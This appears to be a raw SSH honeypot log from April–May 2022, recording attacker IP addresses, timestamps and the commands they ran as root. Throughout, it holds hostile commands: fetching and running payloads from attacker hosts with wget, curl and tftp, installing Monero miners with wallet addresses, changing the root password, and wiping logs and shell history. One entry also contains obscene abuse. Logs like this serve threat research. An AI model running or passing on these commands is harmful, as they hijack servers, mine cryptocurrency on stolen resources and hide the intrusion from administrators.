205.185.117.82:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./sshd && ./krane 123456 cd /tmp wget 205.185.117.82:8000/miner.tar || curl -o miner.tar 205.185.117.82:8000/miner.tar tar xvf miner.tar cd miner chmod +x * ./sshd ./krane 123456 From 185.28.39.119 25-Apr-2022 09:20:41 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119 chmod 777 sh ./sh root rm -rf sh From 209.141.57.143 26-Apr-2022 08:38:13 ssh2 root Exec cd /tmp && wget 209.141.48.15:8000/miner.tar || curl -o miner.tar 209.141.48.15:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./miner; rm -rf *; rm -rf ../* cd /tmp wget 209.141.48.15:8000/miner.tar || curl -o miner.tar 209.141.48.15:8000/miner.tar tar xvf miner.tar cd miner chmod +x * ./miner rm -rf * rm -rf ../* From 45.85.190.242 26-Apr-2022 14:25:35 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://45.85.190.242/sh || curl -O http://45.85.190.242/sh || tftp 45.85.190.242 -c get sh; tftp -g -r sh 45.85.190.242; chmod 777 sh;./sh root; rm -rf sh cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://45.85.190.242/sh || curl -O http://45.85.190.242/sh || tftp 45.85.190.242 -c get sh tftp -g -r sh 45.85.190.242 chmod 777 sh ./sh root rm -rf sh From 20.127.13.19 26-Apr-2022 22:49:21 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred5.txt -o /tmp/dred5.txt;perl /tmp/dred5.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred5.txt -o /tmp/dred5.txt perl /tmp/dred5.txt From 179.43.154.185 28-Apr-2022 05:51:54 ssh2 root Exec echo root:dss4tij24jtiu3ji43rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dss4tij24jtiu3ji43rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 34.125.143.40 28-Apr-2022 09:05:43 ssh2 root Exec cd /tmp ; wget 157.90.20.84/ok.sh | curl -O 157.90.20.84/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 157.90.20.84/ok.sh | curl -O 157.90.20.84/ok.sh chmod 777 ok.sh ./ok.sh rm -rf ok.sh history -c From 179.43.156.214 28-Apr-2022 09:25:41 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119 chmod 777 sh ./sh root rm -rf sh From 34.143.230.194 28-Apr-2022 11:17:17 ssh2 root Exec cd /tmp ; wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh chmod 777 ok.sh ./ok.sh rm -rf ok.sh history -c From 34.125.143.40 28-Apr-2022 20:48:36 ssh2 root Exec cd /tmp ; wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh chmod 777 ok.sh ./ok.sh rm -rf ok.sh history -c From 43.135.132.174 29-Apr-2022 15:06:30 ssh2 root Exec echo -n 2j1hjoxu|md5sum;uname -a echo -n 2j1hjoxu|md5sum uname -a From 62.197.136.83 29-Apr-2022 16:11:44 ssh2 root Exec wget 209.141.34.115/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 209.141.34.115/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 179.43.156.214 30-Apr-2022 06:18:13 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh; tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh tftp -g -r sh 185.28.39.119 chmod 777 sh ./sh root rm -rf sh From 216.224.123.24 30-Apr-2022 07:11:51 ssh2 root Exec cat /etc/os-release cat /etc/os-release From 179.43.156.214 30-Apr-2022 07:18:11 ssh2 root Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh; tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh cd /tmp cd /dev cd /mnt cd /var rm -rf sh wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh tftp -g -r sh 185.28.39.119 chmod 777 sh ./sh root rm -rf sh From 35.189.4.165 30-Apr-2022 13:12:56 ssh2 root Exec cd /tmp ; wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh chmod 777 ok.sh ./ok.sh rm -rf ok.sh history -c From 64.31.49.114 30-Apr-2022 17:12:12 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://45.95.55.17/76d32be0.sh; curl -O http://45.95.55.17/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 45.95.55.17 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 45.95.55.17; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.17 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf * cd /tmp cd /var/run cd /mnt cd /root cd / wget http://45.95.55.17/76d32be0.sh curl -O http://45.95.55.17/76d32be0.sh chmod 777 76d32be0.sh sh 76d32be0.sh tftp 45.95.55.17 -c get 76d32be0.sh chmod 777 76d32be0.sh sh 76d32be0.sh tftp -r 76d32be02.sh -g 45.95.55.17 chmod 777 76d32be02.sh sh 76d32be02.sh ftpget -v -u anonymous -p anonymous -P 21 45.95.55.17 76d32be01.sh 76d32be01.sh sh 76d32be01.sh rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh rm -rf * From 106.126.14.181 2-May-2022 02:48:58 ssh2 root Exec cd /tmp ; wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh chmod 777 ok.sh ./ok.sh rm -rf ok.sh history -c From 179.43.154.185 2-May-2022 17:37:01 ssh2 root Exec echo root:ds34tij24iu33ji433r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:ds34tij24iu33ji433r3g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 37.0.11.130 5-May-2022 06:15:39 ssh2 root Exec cat /proc/cpuinfo | grep 'model name' cat /proc/cpuinfo | grep 'model name' From 37.0.11.130 5-May-2022 09:09:16 ssh2 root Exec cat /proc/cpuinfo | grep 'model name' cat /proc/cpuinfo | grep 'model name' From 179.43.142.180 6-May-2022 01:52:28 ssh2 root Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jtiu3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 61.183.35.20 7-May-2022 01:45:55 ssh2 root Exec nproc;uname -a nproc uname -a From 93.191.115.126 7-May-2022 08:18:56 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred7.txt -o /tmp/dred7.txt;perl /tmp/dred7.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred7.txt -o /tmp/dred7.txt perl /tmp/dred7.txt From 179.43.154.185 7-May-2022 22:36:50 ssh2 root Exec echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 92.204.160.154 8-May-2022 06:21:41 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2 From 179.43.142.180 9-May-2022 10:34:59 ssh2 root Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jtiu3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 179.43.142.180 9-May-2022 13:34:27 ssh2 root Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jtiu3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 222.186.57.13 11-May-2022 11:25:11 ssh2 root lscpu netstat -antp netstat -antp uname -a ifconfig ethtool eth0 yum install net-tools curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43TzrzryJgiH4UBjkgx6jgB6Rkx5AmcAg9grAJHVTFaZepwvMhX1KwTMMZV1iU9rQnDsE5X5zWAoKguABvKcLrVgQu9UtWi rm -rf /root/.bash_history echo>/var/log/syslog echo>/var/log/messages echo>/var/log/httpd/access_log echo>/var/log/httpd/error_log echo>/var/log/xferlog echo>/var/log/secure echo>/var/log/auth.log echo>/var/log/user.log echo>/var/log/lastlog echo>/var/log/btmp echo>/var/run/utmp echo>/var/log/wtmp rm -rf .bash_history history -c history -c From 178.62.216.128 12-May-2022 02:22:01 ssh2 root Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop curl -O http://134.122.59.164/systemd curl -O http://134.122.59.164/banner.log curl -O http://134.122.59.164/bios.txt curl -O http://134.122.59.164/bone curl -O http://134.122.59.164/brute curl -O http://134.122.59.164/hrdmv1 curl -O http://134.122.59.164/loop curl -O http://134.122.59.164/mfu.txt curl -O http://134.122.59.164/motd curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd wget http://134.122.59.164/pass_file wget http://134.122.59.164/motd wget http://134.122.59.164/mfu.txt wget http://134.122.59.164/loop wget http://134.122.59.164/hrdmv1 wget http://134.122.59.164/brute wget http://134.122.59.164/boner wget http://134.122.59.164/bios.txt wget http://134.122.59.164/banner.log chmod 777 * bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX apt install -y zmap || yum install -y zmap || dnf install -y zmap apt install -y screen || yum install -y screen || dnf install -y screen screen -S 'auto' ./loop From 185.188.182.226 12-May-2022 10:22:01 ssh2 root Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus From 139.99.131.116 13-May-2022 06:50:38 ssh2 root Exec cd /tmp ; rm -rf ok.sh wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 46.105.83.253/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp rm -rf ok.sh wget 46.105.83.253/ok.sh sh ok.sh rm -rf ok.sh curl -O 46.105.83.253/ok.sh sh ok.sh rm -rf ok.sh history -c wget 46.105.83.253/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 45.61.188.244 13-May-2022 12:26:41 ssh2 root Exec wget 194.31.98.205/x86_64; chmod 777 x86_64; ./x86_64 wns.x86 wget 194.31.98.205/x86_64 chmod 777 x86_64 ./x86_64 wns.x86 From 179.43.154.185 13-May-2022 17:20:02 ssh2 root Exec echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 106.126.14.180 14-May-2022 09:25:44 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt;perl /tmp/dred6.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt perl /tmp/dred6.txt From 182.66.193.220 14-May-2022 11:47:30 ssh2 root Exec uname -a;cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;history -c uname -a cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c history -c From 139.99.131.116 14-May-2022 14:44:45 ssh2 root Exec cd /tmp ; rm -rf ok.sh wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 46.105.83.253/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp rm -rf ok.sh wget 46.105.83.253/ok.sh sh ok.sh rm -rf ok.sh curl -O 46.105.83.253/ok.sh sh ok.sh rm -rf ok.sh history -c wget 46.105.83.253/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 20.91.186.105 15-May-2022 01:49:08 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt;perl /tmp/dred6.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt perl /tmp/dred6.txt From 179.43.142.180 15-May-2022 09:18:12 ssh2 root Exec echo root:dgtij24jti3u3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jti3u3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 106.10.122.53 15-May-2022 10:27:30 ssh2 root Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus From 106.10.122.53 15-May-2022 10:37:09 ssh2 root Exec nproc;nvidia-smi --list-gpus nproc nvidia-smi --list-gpus From 179.43.142.180 15-May-2022 21:21:18 ssh2 root Exec echo root:dgtij24jti3u3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:dgtij24jti3u3ji4rg|chpasswd|bash lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 178.138.98.73 16-May-2022 06:24:22 ssh2 root w ls -a lscpu w ls -a halt /init 1 init 1 suck my cook lick my balls suck my BIG ROMANIAN DICK you lil ugly duck :))) exit From 139.99.131.116 16-May-2022 14:27:59 ssh2 root Exec cd /tmp ; rm -rf ok.sh wget 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 139.99.131.116/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp rm -rf ok.sh wget 139.99.131.116/ok.sh sh ok.sh rm -rf ok.sh curl -O 139.99.131.116/ok.sh sh ok.sh rm -rf ok.sh history -c wget 139.99.131.116/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 139.99.131.116 16-May-2022 21:49:00 ssh2 root Exec cd /tmp ; rm -rf ok.sh wget 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 139.99.131.116/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history cd /tmp rm -rf ok.sh wget 139.99.131.116/ok.sh sh ok.sh rm -rf ok.sh curl -O 139.99.131.116/ok.sh sh ok.sh rm -rf ok.sh history -c wget 139.99.131.116/cnrig chmod 777 cnrig ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B history -c cat /dev/null > ~/.bash_history history -c rm -rf /root/.bash_history From 209.141.60.126 17-May-2022 11:19:06 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 209.141.60.126 17-May-2022 12:19:06 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 122.155.165.65 17-May-2022 19:27:26 ssh2 root Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 103.152.37.54 17-May-2022 19:33:48 ssh2 root Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > 